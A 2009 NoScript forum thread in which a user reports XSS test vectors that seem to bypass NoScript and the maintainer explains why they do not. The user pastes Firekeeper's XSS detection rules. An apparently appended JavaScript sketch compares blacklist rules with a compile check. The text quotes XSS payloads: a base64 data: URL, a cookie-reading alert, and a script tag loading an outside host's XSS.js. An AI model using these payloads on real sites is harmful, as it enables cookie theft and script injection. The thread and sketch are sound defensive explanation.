XSS exploit not detected by NoScript

General discussion about the NoScript extension for Firefox
luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

XSS exploit not detected by NoScript

Post by luntrus » Mon Mar 23, 2009 3:51 pm

Hi Giorgio Maone,

The following attack vector: data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
was not being detected by NoScript when tested here: hxxp://bypass.xssing.com/testing.php?ve ... NjcmlwdD4=

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090322 Minefield/3.6a1pre

Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: XSS exploit not detected by NoScript

Post by Alan Baxter » Mon Mar 23, 2009 4:02 pm

Thank you for posting this over here, luntrus. Was this one of the exploits tagged by Firekeeper?
http://forum.avast.com/index.php?topic= ... #msg364676
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7

Giorgio Maone
Site Admin
Posts: 8700
Joined: Wed Mar 18, 2009 11:22 pm
Location: Palermo - Italy

Re: XSS exploit not detected by NoScript

Post by Giorgio Maone » Mon Mar 23, 2009 4:05 pm

As I already explained elsewhere, this "exploit" is irrelevant to NoScript.
How is it exactly supposed to trigger, while NoScript is enabled?
data: URLs are blocked by NoScript on untrusted sites, and they inherit the same principal as the hosting page, so they're not cross-site.
So, can you show me a plausible scenario in which this "exploit" can be successful with NoScript?

On a side note, where did you take it to test? It's the second time I see it wrongly reported as "XSS bypassing NoScript"...
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)

luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Re: XSS exploit not detected by NoScript

Post by luntrus » Mon Mar 23, 2009 7:56 pm

Hi Giorgio Maone,

I believe you when you say that when script is disabled to run, then no exploit can be executed.
That is simple logic, and everybody can understand that.
The tests are to be found here: http://www.xssing.com/index.php?x=1 (and subsequent pages)

Normally I get a Firekeeper alert like for instance this one:


 === Triggered rule ===
alert(url_content:"%3CBR"; nocase; msg:"<br> tags GET request cross site scripting attempt"; url_re:"/%3Cbr.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://bypass.xssing.com/testing.php?vector=%22%3E/XaDoS/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Cbr%20/%3Esrc=%22http://www.site.com/XSS.js%22%3E%3C/script%3E


or Netcraft warns me here:
The page you are trying to visit is using Cross-Site Scripting (XSS).
This is a technique commonly used in phishing attacks.

URL: http://bypass.xssing.com/testing.php%3f ... ion(alert())%253E

If this is a mistake, please report it using
'Report Incorrectly Blocked URL' in the Netcraft Menu.

Do you still want to go there?


But I do not get a warning from NoScript, is this because I have RequestPolicy also active on the test page?

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090323 Minefield/3.6a1pre

Giorgio Maone
Site Admin
Posts: 8700
Joined: Wed Mar 18, 2009 11:22 pm
Location: Palermo - Italy

Re: XSS exploit not detected by NoScript

Post by Giorgio Maone » Mon Mar 23, 2009 8:29 pm

luntrus wrote:But I do not get a warning from NoScript, is this because I have RequestPolicy also active on the test page?

If you don't get the warning for any of the PoCs there, it means that you don't have bypass.xssing.com in your whitelist: if there's no scripting, there's no cross-site scripting either.
If even after whitelisting bypass.xssing.com some PoCs don't trigger the warning, it just means that the PoC as it is cannot work in Firefox, either because it's not compatible with Mozilla browsers (e.g. attacks based on proprietary Microsoft extensions, such as CSS expressions), or it is not correctly implemented (the 1st data: "PoC" is just flawed, it couldn't run on any browser as it is), or some secondary NoScript protection blocks its execution independently from XSS.

In other words, even though they are presented as "XSS exploits", those which don't trigger NoScript's warnings can be considered false positives if they do in FireKeeper. This is understandable, since FireKeeper uses generic hardcoded rules, a blacklist which is not specifically tailored to Firefox and in fact contains Microsoft-specific signatures for exploits which work on IE but mean nothing to Firefox.
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)

luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Re: XSS exploit not detected by NoScript

Post by luntrus » Mon Mar 23, 2009 9:01 pm

Hi Giorgio Maone,

That is all understandable and is quite reassuring, so the protection of NoScript is completely foolproof in these respects, and having Firekeeper there is just educational so that it will keep the browser user alert to what rules are eventually triggered.
I think it is never a bad thing for the security-savvy user to be aware of what is going on in the browser. I keep an eye on the error console and if something crops up I will report it here, of course.

The Firekeeper rules against XSS exploits are as follows:

#Rules to detect cross site scripting attacks


####Created by Thomas Kilgore

# javascript: uri schemes in GET requests
alert(url_content:"javascript:"; nocase; msg:"javascript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"mocha:"; nocase; msg:"mocha: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"livescript:"; nocase;  msg:"livescript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

# normalish html tags using %3C and %3E in GET requests
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CIMG"; nocase; msg:"<img> tags GET request cross site scripting attempt"; url_re:"/%3Cimg.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ciframe"; nocase; msg:"<iframe> tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ciframe"; nocase; msg:"malformed <iframe< tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3C/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cbody"; nocase; msg:"<body> tags GET request cross site scripting attempt"; url_re:"/%3Cbody.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CINPUT"; nocase; msg:"<input> tags GET request cross site scripting attempt"; url_re:"/%3CINPUT.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CBGSOUND"; nocase; msg:"<bgsound> tags GET request cross site scripting attempt"; url_re:"/%3CBGSOUND.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3CBR"; nocase; msg:"<br> tags GET request cross site scripting attempt"; url_re:"/%3Cbr.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Clayer"; nocase; msg:"<layer> tags GET request cross site scripting attempt"; url_re:"/%3Clayer.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Clink"; nocase; msg:"<link> tags GET request cross site scripting attempt"; url_re:"/%3Clink.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cstyle"; nocase; msg:"<style> tags GET request cross site scripting attempt"; url_re:"/%3Cstyle.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cmeta"; nocase; msg:"<meta> tags GET request cross site scripting attempt"; url_re:"/%3Cmeta.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cframe"; nocase; msg:"<frame> tags GET request cross site scripting attempt"; url_re:"/%3Cframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ctable"; nocase; msg:"<table> tags GET request cross site scripting attempt"; url_re:"/%3Ctable.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cdiv"; nocase; msg:"<div> tags GET request cross site scripting attempt"; url_re:"/%3Cdiv.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ctd"; nocase; msg:"<td> tags GET request cross site scripting attempt"; url_re:"/%3Ctd.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ca"; nocase; msg:"<a> tags GET request cross site scripting attempt"; url_re:"/%3Ca.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cbase"; nocase; msg:"<base> tags GET request cross site scripting attempt"; url_re:"/%3Cbase.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cobject"; nocase; msg:"<object> tags GET request cross site scripting attempt"; url_re:"/%3Cobject.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Capplet"; nocase; msg:"<applet> tags GET request cross site scripting attempt"; url_re:"/%3Capplet.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cembed"; nocase; msg:"<embed> tags GET request cross site scripting attempt"; url_re:"/%3Cembed.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cxml"; nocase; msg:"<xml> tags GET request cross site scripting attempt"; url_re:"/%3Cxml.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Cspan"; nocase; msg:"<span> tags GET request cross site scripting attempt"; url_re:"/%3Cspan.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Chtml"; nocase; msg:"<html> tags GET request cross site scripting attempt"; url_re:"/%3Chtml*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3Ct:set"; nocase; msg:"<t:set> tags GET request cross site scripting attempt"; url_re:"/%3Ct:set*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

# suspicious HTML-looking input.
alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3C"; url_content:"%2F"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %2F. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
alert(url_content:"%3C"; url_content:"'"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and '. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

# IE hax.
alert (msg:"smuggling Javascript inside an image"; headers_content:"image"; nocase; headers_re:"/^Content-Type.*image/mi"; body_re:"/<script/i";)

####
Why is there not a specific one just for Firefox?
Furthermore, many, many thanks for your detailed explanation of the facts,

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090323 Minefield/3.6a1pre

Giorgio Maone
Site Admin
Posts: 8700
Joined: Wed Mar 18, 2009 11:22 pm
Location: Palermo - Italy

Re: XSS exploit not detected by NoScript

Post by Giorgio Maone » Mon Mar 23, 2009 9:44 pm

luntrus wrote: Why is there not a specific one just for Firefox?

Because NoScript exists for Firefox ;)

BTW, just at a glance from the rules you pasted, BGSOUND is not supported by Firefox, and the last rule clearly reveals some of these rules are IE-specific:


# IE hax.
alert (msg:"smuggling Javascript inside an image"; headers_content:"image"; nocase; headers_re:"/^Content-Type.*image/mi"; body_re:"/<script/i";)


NoScript doesn't use generic blacklists like these: it takes a different, more specific and yet more flexible approach, by checking if JavaScript code is being injected and if it's actually compilable in Firefox's JavaScript engine.
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)
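The contrast drawn in this thread, between Firekeeper's blacklist of byte sequences in the request URL and NoScript's "is the injected fragment actually compilable JavaScript?" approach, as an added illustration that is not code from NoScript, Firekeeper or anyone posting here. Two rules are transcribed from the ruleset pasted above and run against the raw URL; the second check instead decodes what the request delivers (query parameter values for an http URL, or the base64 body of the data: URL from the first post), pulls out script-shaped fragments and asks the engine whether they compile, here via new Function in Node.js. The candidate extraction, the "must contain a call" heuristic, the decoding of the data: body as plain bytes (the utf-7 label is ignored) and the example.test host are assumptions and simplifications for this sketch; NoScript's real filter has many more heuristics. The three sample URLs are constructed for the demo, the first being the request URL from luntrus's Firekeeper alert.

```javascript
'use strict';

// Two rules transcribed from the pasted Firekeeper ruleset. url_content is a
// case-insensitive substring test on the raw request URL, url_re a regex on it.
const FIREKEEPER_STYLE_RULES = [
  { msg: '<br> tags GET request cross site scripting attempt',
    urlContent: '%3CBR', urlRe: /%3Cbr.*%3E/i },
  { msg: '<script> tags GET request cross site scripting attempt',
    urlContent: '%3CSCRIPT', urlRe: /%3Cscript.*%3E/i },
  { msg: 'javascript: GET request cross site scripting attempt',
    urlContent: 'javascript:', urlRe: null },
];

// Blacklist approach: forbidden byte sequences in the percent-encoded URL.
function blacklistAlerts(rawUrl) {
  const lower = rawUrl.toLowerCase();
  return FIREKEEPER_STYLE_RULES
    .filter(r => lower.includes(r.urlContent.toLowerCase()) &&
                 (r.urlRe === null || r.urlRe.test(rawUrl)))
    .map(r => r.msg);
}

// Syntax approach: would this fragment compile in the engine we run in?
// new Function() throws a SyntaxError for anything that is not a valid
// function body, so markup such as "<br>" or '"></title>' is rejected.
function compilesAsJs(src) {
  try { new Function(src); return true; } catch (e) { return false; }
}

// Simplification (assumption, not NoScript's real heuristics): a fragment
// counts as injected script only if it compiles AND contains a call, so a
// bare word like "hello" (which is valid JS) is not flagged.
function looksLikeInjectedScript(src) {
  return compilesAsJs(src) && /[\w$)\]]\s*\(/.test(src);
}

// Script-shaped fragments of a decoded value: the whole value, <script>
// bodies, on*= handler values and javascript: URL bodies.
function scriptCandidates(text) {
  const out = [text];
  for (const m of text.matchAll(/<script(?:\s[^>]*)?>([\s\S]*?)<\/script>/gi)) out.push(m[1]);
  for (const m of text.matchAll(/\bon\w+\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi)) out.push(m[1] ?? m[2] ?? m[3]);
  for (const m of text.matchAll(/javascript:([^"'\s>]+)/gi)) out.push(m[1]);
  return out.map(s => s.trim()).filter(Boolean);
}

// What the URL actually delivers: query parameter values for http(s), the
// embedded document for a data: URL (base64 body decoded as raw bytes;
// the charset label is deliberately ignored in this sketch).
function decodedPayloads(rawUrl) {
  const m = /^data:([^,]*?)(;base64)?,(.*)$/i.exec(rawUrl);
  if (m) {
    return [m[2] ? Buffer.from(m[3], 'base64').toString('latin1') : decodeURIComponent(m[3])];
  }
  return [...new URL(rawUrl).searchParams.values()];
}

// Fragments that really compile as script, deduplicated.
function injectedScriptAlerts(rawUrl) {
  const hits = [];
  for (const payload of decodedPayloads(rawUrl)) {
    for (const c of scriptCandidates(payload)) {
      if (looksLikeInjectedScript(c)) hits.push(c);
    }
  }
  return [...new Set(hits)];
}

// Constructed samples: the request URL from the Firekeeper alert quoted in
// this thread, a harmless page using <br> in a parameter, and the data: URL
// from the first post.
const SAMPLES = {
  firekeeperHit: 'http://bypass.xssing.com/testing.php?vector=%22%3E/XaDoS/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Cbr%20/%3Esrc=%22http://www.site.com/XSS.js%22%3E%3C/script%3E',
  harmlessBr: 'http://example.test/page.php?text=line%20one%3Cbr%3Eline%20two',
  dataUrl: 'data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=',
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, url] of Object.entries(SAMPLES)) {
    console.log(name, { blacklist: blacklistAlerts(url), compiled: injectedScriptAlerts(url) });
  }
}
```

Running it shows the difference in kind: the blacklist fires twice on the real injection and once on the harmless "<br>" page (a false positive), while it sees nothing in the data: URL because base64 contains none of the percent-encoded sequences; the compile check reports only the fragments that really are executable, alert(document.cookie) and alert(1337), and stays quiet on the <br> page.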
